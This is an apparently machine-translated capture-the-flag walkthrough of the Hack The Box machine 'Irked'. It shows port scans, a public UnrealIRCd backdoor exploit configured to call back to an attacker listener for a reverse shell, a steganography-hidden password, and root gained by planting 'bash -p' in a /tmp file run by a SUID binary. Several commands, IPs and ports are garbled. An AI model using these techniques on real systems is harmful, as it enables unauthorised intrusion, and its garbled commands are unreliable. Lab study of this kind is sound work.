disclaimer
The hosts infiltrated in this article are legally authorized. The tools and methods used in this article are only for learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purposes. I am not responsible for any consequences arising therefrom, nor for any misuse or damage caused.
Service discovery
Let’s see what ports the target has open
Chrysene ─(root💀kali)-[~] ├ ─# nmap 08.07.88 -- open-p-starting nmap 08.88 (https://nmap.org) at 2021-12-22 03:47 EST Stats: 0:00:12 elapsed; 0 hosts Completed (1 UP), 1 Undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 4.25% done; ETC: 03:52 (0:04:30 remaining) Stats: 0:00:13 elapsed; 0 hosts Completed (1 UP), 1 Undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 4.68% done; ETC: 03:52 (0:04:25 remaining) Stats: 0:00:14 elapsed; 0 hosts Completed (1 UP), 1 Undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 5.19% done; ETC: 03:52 (0:04:16 remaining) Nmap scan report for 10.10.10.117 Host is up (0.31s latency). Not shown: 65492 closed ports, 36 filtered ports Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 6697/tcp open ircs-u 8067/tcp open infi-async 38540/tcp open unknown 65534/ TCP open Unknown Nmap done: 1 IP address (1 host up) Scanned in 113.95 secondsCopy the codeGet the details of these ports
┌ ─ ─ (root 💀 kali) - ~ / HTB/Irked └ ─ # nmap - sV - 22,80,111,6697,8067,38540,65534 Pn 10.10.10.117 - p - A - O 130 ⨯ Host Discovery disabled (-pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 (slower) https://nmap.org) at 2021-12-22 03:52 EST Nmap scan report for 10.10.10.117 Host is up (latency). PORT STATE The SERVICE VERSION 22 / TCP open SSH OpenSSH p1 Debian 6.7 5 + deb8u4 (protocol 2.0) | SSH - hostkey: | 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA) | 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA) | 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA) |_ 256 8 d: 1 b: 43: c7: d0:1 a: 4 c: 05: cf: 82: Ed: c1:01:6 3: a2:0 c (ED25519) 80 / TCP open HTTP Apache HTTPD 2.4.10 ((Debian)) | _http - server - the header: Apache / 2.4.10 (Debian) | _http - the title: Site doesn't have a title (text/html). 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | the program version port/proto service | 100000 2 and 4, 111 / TCP rpcbind | 100000 2 and 4, 111 / udp rpcbind | 3, 4, 111/100000 tcp6 Rpcbind | 100000 3, 4, 111 / udp6 rpcbind | 100024 1 33839 / udp status | 100024 1 38540 / TCP status | 100024 1 49259 / udp6 status |_ 100024 1 52644/tcp6 status 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 38540/tcp open status 1 (RPC #100024) 65534/tcp open irc UnrealIRCd Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2-4.9 (95%), Linux 3.8-3.11 (95%), Linux 4.8 (95%), Linux 4.4 (95%), Linux 4.2 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%) No exact OS matches for host (test conditions non ideal). Network Distance: 2 hops Service Info: Host: irked.htb; OS: Linux; CPE: Cpe :/ O: Linux :linux_kernel TRACEROUTE (using port 111/ TCP) HOP RTT ADDRESS 1 310.44 ms 10.10.14.12 311.20 ms 10.10.10.117 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/. Nmap Done: 1 IP address (1 host up) Scanned in 40.39 secondsCopy the codeOpen port 80, the home page is a picture, there is a line of text
IRC is almost working!
Nothing else from the blowup catalog. The only place to start is with the IRC service.
An explanation of IRC services on wikipedia
Internet Relay Chat (IRC) is an application-layer protocol. It is mainly used for group chat, but can also be used for person-to-person chat. Use IRC server port 6667 (plaintext transmission, such as irc://irc.freenode.net), 6697 (SSL encryption transmission, such as ircs://irc.freenode.net: 6697), etc.
It sounds like a chat room
Try nc to connect to the service
Chrysene - (root💀kali)-[~/ HTB /Irked] ├ ─# nc10.10.10.688, scient.htb NOTICE AUTH :*** Looking up your hostname... :irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; Using your IP address instead 10.10.14.3 :irked. HTB 451 10.10.14.3 :You have not registeredCopy the codeThe initial shell
Do a Google search and find a possible backdoor to the service. Find exp on Github
Modify these two lines of code:
Local_ip = '10.10.14.3' # CHANGE THIS local_port = '4242' # CHANGE THISCopy the codeStart a listener
nc -lnvp 4242
Perform attack
Chrysene ─(root💀kali)-[~/ HTB /Irked] ├ ─# python3 irc_exp. Py 10.10.10.688 -payload python 1 ⨯ Exploit sent successfully!Copy the codeThe rebound shell was received. Procedure
Chrysene ─(root💀kali)-[~/ HTB /Irked] ├ ─# nc-lnVP 862 listening on [any] 862... Connect to [10.10.14.3] from (UNKNOWN) [10.10.10.117] 55352 ircd@irked:~/Unreal3.2$ID ID UID =1001(ircd) GID =1001(ircd) Groups =1001(ircd) ircd@irked:~/Unreal3.2$whoami whoami ircd ircd@irked:~/Unreal3.2$Copy the codeUser.txt under user djmardov, we do not have permission to view it
The right to djmardov
There is a backup file hidden in the sibling directory
ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
Copy the codeIt looks a bit like djmardov’s password, but you can’t switch to djmardov directly. It’s probably encrypted ciphertext
Super elite steg backup pw
Steganography is Steganography, which usually hides information in an image. We know that port 80 has an image on its home page. We download the image locally and use the Steghide command to isolate the Steganography file
Chrysene ─(root💀kali)-[~/ HTB /Irked] ├ ─# imp. · Edited data to "pass.txt". (root💀kali)-[~/ HTB /Irked] ├ ─# cat pass.txt Kab6h+m+bbp2J:HGCopy the codeGet a pass. TXT file with the following contents: Kab6h+m+bbp2J:HG
It’s the password for djmardov. Get user.txt
ircd@irked:/home/djmardov/Documents$ su djmardov su djmardov Password: Kab6h+m+bbp2J:HG djmardov@irked:~/Documents$cat user.txt cat user.txtCopy the codeThe right to the root
Using Linpea, look at the SUID
═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ╣ Interesting Files ╠ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ╔ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ╣ SUID - Check easy privesc, Exploits and write perms ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid the strace Not Found -rwsr-xr-- 1 root messagebus 355K Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper (Unknown SUID binary) -rwsr-xr-x 1 root root 9.3K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device (Unknown SUID binary) -rwsr-xr-x 1 root root 14K Sep 8 2016 /usr/lib/policykit-1/polkit-agent-helper-1 -rwsr-xr-x 1 root root 550K Nov 19 2017 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 14K Oct 14 2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper (Unknown SUID binary) -rwSR-xr-x 1 root root 1.1m Feb 10 2018 /usr/sbin/exim4-rwsr-xr -- 1 root dip 332K Apr 14 2015 /usr/sbin/pppd --> apple_mac_osx_10.4.8 (05-2007) -rwSR-xr -x 1 root root 43K May 17 2017 /usr/bin/chsh (Unknown SUID) binary) -rwsr-sr-x 1 root mail 94K Nov 18 2017 /usr/bin/procmail -rwsr-xr-x 1 root root 77K May 17 2017 /usr/bin/gpasswd -rwsr-xr-x 1 root root 38K May 17 2017 /usr/bin/newgrp --> hP-ux_10.20 -rwsr-sr-x 1 daemon daemon 50K Sep 30 2014 /usr/bin/at-> rtru64_unix_4.0g (cVE-2002-1614) -rwsr-xr-x 1 root root root 18K Sep 8 2016 /usr/bin/pkexec --> Linux4.10_to_5.1.17(CVE-2019-13272)/ rHEL_6 (CVE-2011-1485) -rWSR-sr-x 1 Root root 9.3k Apr 1 2014 /usr/bin/x-rwsr-xr-x 1 root root 52K May 17 2017 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/ SolarIS_8/9 (12-2004)/SPARC_8/9/ SUN_Solaris_2.3_TO_2.5.1 (02-1997) -RWSR-xr-x 1 root root 52K May 17 2017 /usr/bin/chfn --> suse_9.3/10 -rwsr-xr-x 1 root root 7.2k May 16 2018 /usr/bin/viewuser (Unknown SUID binary) -rwsr-xr-x 1 root root 95K Aug 13 2014 /sbin/mount.nfs -rwsr-xr-x 1 root root 38K May 17 2017 /bin/su -rwsr-xr-x 1 root Root 34K Mar 29 2015 /bin/mount --> Apple_Mac_OSX(Lion) _kernel_xnu-1699.32.7_EXCEPt_xnu-1699.24.8 - RWSR -xr-x 1 root root 34K Jan 21 2016 /bin/fusermount (Unknown SUID binary) -rwsr-xr-x 1 root root 158K Jan 28 2017 /bin/ntfs-3g ---> Debian9/8/7 / Ubuntu/Gentoo/others/Ubuntu_Server_16. 10 _and_others (02-2017) - RWSR xr - x 1 root root 26 k Mar 29, 2015 /bin/umount ---> BSD/Linux(08-1996)Copy the codeI find this command a bit fishy: /usr/bin/viewuser
Use the strings command to view
djmardov@irked:/tmp$ strings /usr/bin/viewuser /lib/ld-linux.so.2 libc.so.6 _IO_stdin_used setuid puts system __cxa_finalize __libc_start_main glibc_2.0 glibc_2.3_ITM_deregistertmclonetable __gmon_start__ _ITM_registerTMCloneTable UWVS [^_] This application is being devleoped to set and test user permissions It is still being actively developed /tmp/listusersCopy the codeThis command will execute another command: / TMP /listusers
Listusers does not exist, and/TMP is writable
That’s easy. Create a ListUsers file
touch /tmp/listusers
Write commands to this file
echo “bash -p” > /tmp/listusers
Empowerment is enforceable
chmod +x listusers
Run SUID to raise rights to root
djmardov@irked:/tmp$ /usr/bin/viewuser This application is being devleoped to set and test user permissions It is still Being actively developed (Unknown) :0 2021-12-22 05:03 (:0) DJmardov PTS /1 2021-12-22 05:14 (10.10.14.3) root@irked:/tmp# id uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner) ,117(bluetooth) root@irked:/tmp# whoami root root@irked:/tmp# cat /root/root.txtCopy the code